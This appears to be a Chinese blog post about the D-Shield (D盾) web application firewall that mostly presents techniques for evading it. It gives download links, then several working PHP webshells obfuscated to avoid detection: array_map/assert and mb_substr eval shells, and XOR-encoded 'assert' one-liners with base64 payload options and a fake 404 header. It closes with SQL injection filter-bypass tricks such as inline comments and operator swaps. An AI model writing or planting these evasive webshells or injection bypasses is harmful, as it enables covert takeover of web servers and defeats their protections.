应用安全-安全设备-Waf系列-软Waf-D盾

安装

下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip

使用说明

http://www.d99net.net/News.asp?id=106

免杀

array_map |  assert

<?php 
function test($a, $b)
{
    array_map($a, $b);
}
test(assert, array($_POST['x']));
?> 

mb_substr

<?php
$m=$_GET['1'];
$a=mb_substr($m,0,1); 
$b=mb_substr($m,1,9999);
eval($a.$b);
?>

PHP一句话

class LTDS
{
    public function __destruct()
    {
        $bxo='X'^"\x39";
        $woa='?'^"\x4c";
        $ukt='K'^"\x38";
        $gud='d'^"\x1";
        $fbu='_'^"\x2d";
        $agx='<'^"\x48";
        $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;
        return @$HLWV($this->OX);
    }
}
$ltds=new LTDS();
@$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8'];

http://www.xxx.com/shell.php  
POST: ua8=phpinfo();  //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随意更改)
POST: ua8=cGhwaW5mbygpOwo=  //payload的base64编码

异或 | PHP一句话

<?php 
header('HTTP/1.1 404');
class ZXVG
{
    public $c='';
    public function __destruct()
    {
        $_0='&'^"\x47";
        $_1='C'^"\x30";
        $_2='A'^"\x32";
        $_3='v'^"\x13";
        $_4='J'^"\x38";
        $_5='f'^"\x12";
        $db=$_0.$_1.$_2.$_3.$_4.$_5;
        return @$db($this->c);
    }
}
$zxvg=new ZXVG();
@$zxvg->c=$_POST['mr6'];

 

注入绕过

1)
and 1=1和and 1=22%26%26 True 和 %26%26 False

(3)
Xor True 和 Xor False 

(4)
http://127.0.0.1/sqli.php?id=1/**//*!order*//**//*!by*//**//*!1*/ #order by 内联
5)
union select 内联

(6)
盲注
posted @ 2019-08-15 10:38  7hang  阅读(440)  评论(0编辑  收藏  举报